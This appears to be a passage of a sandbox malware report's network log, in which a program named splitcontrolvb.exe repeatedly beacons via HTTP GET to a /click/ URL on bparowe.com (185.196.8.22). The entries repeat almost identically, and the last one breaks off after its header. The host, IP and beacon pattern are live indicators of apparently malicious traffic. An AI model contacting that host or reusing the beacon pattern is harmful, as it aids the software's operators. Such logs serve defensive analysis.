                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:08.468774080 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:08.747692108 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:08 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                158192.168.2.456123185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:09.166402102 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:09.472165108 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:09 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                159192.168.2.456124185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:10.036421061 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:10.314297915 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:10 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                160192.168.2.456125185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:10.713188887 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:10.986671925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:10 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                161192.168.2.456126185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:11.396342993 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:11.676255941 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:11 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                162192.168.2.456127185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:12.139869928 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:12.419209957 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:12 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                163192.168.2.456128185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:13.051006079 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:13.329222918 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:13 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                164192.168.2.456129185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:13.743566036 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:14.017750025 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:13 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                165192.168.2.456130185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:14.503932953 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:14.782939911 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:14 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                166192.168.2.456131185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:15.515386105 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:15.793250084 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:15 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                167192.168.2.456132185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:16.202502966 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:16.481069088 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:16 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                168192.168.2.456133185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:16.888999939 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:17.166065931 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:17 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                169192.168.2.456134185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:17.623384953 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:17.906877041 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:17 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                170192.168.2.456135185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:18.708034992 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:18.987581015 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:18 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                171192.168.2.456136185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:21.856591940 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:22.133557081 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                172192.168.2.456137185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:22.848228931 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:23.127434015 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                173192.168.2.456138185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:23.676866055 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:23.960253954 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                174192.168.2.456139185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:24.397393942 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:24.680305004 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                175192.168.2.456140185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
